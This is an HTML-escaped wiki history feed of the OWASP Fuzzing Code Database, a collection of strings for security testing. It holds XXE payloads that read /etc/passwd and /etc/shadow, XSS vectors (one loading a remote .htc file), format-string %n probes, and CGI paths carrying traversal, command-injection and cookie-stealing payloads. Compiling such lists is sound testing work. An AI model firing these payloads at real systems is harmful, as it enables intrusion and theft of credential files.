&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80089</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80089"/>
				<updated>2010-03-17T22:55:28Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
